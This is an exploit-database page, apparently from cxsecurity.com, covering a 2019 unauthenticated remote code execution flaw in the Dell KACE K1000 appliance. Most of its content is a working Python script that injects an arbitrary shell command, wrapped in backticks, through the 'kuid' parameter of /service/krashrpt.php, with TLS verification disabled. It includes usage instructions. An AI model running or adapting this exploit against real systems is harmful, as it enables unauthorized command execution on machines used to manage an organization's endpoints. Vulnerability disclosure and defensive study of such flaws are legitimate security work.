Dell KACE Systems Management Appliance (K1000) 6.4.120756 Code Execution

2019.04.12
Credit: Julien Ahrens
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/python # Exploit Title: Dell KACE Systems Management Appliance (K1000) <= 6.4.120756 Unauthenticated RCE # Version: <= 6.4.120756 # Date: 2019-04-09 # Author: Julien Ahrens (@MrTuxracer) # Software Link: https://www.quest.com/products/kace-systems-management-appliance/ # Write-up: https://www.rcesecurity.com/2019/04/dell-kace-k1000-remote-code-execution-the-story-of-bug-k1-18652/ # Note: The software is maintained by Quest now, but the vulnerability was fixed while Quest was part of Dell. # # Usage: python3 exploit.py https://localhost 'sleep 10' import requests import sys import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) target_url = sys.argv[1] payload = sys.argv[2] r = requests.post(target_url + '/service/krashrpt.php', data={ 'kuid' : '`' + payload + '`' }, verify=False) print('Response: %s %s\nKACE Version: %s\nResponse time: %ss' % (r.status_code, r.reason, r.headers['X-DellKACE-Version'], r.elapsed.total_seconds()))


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top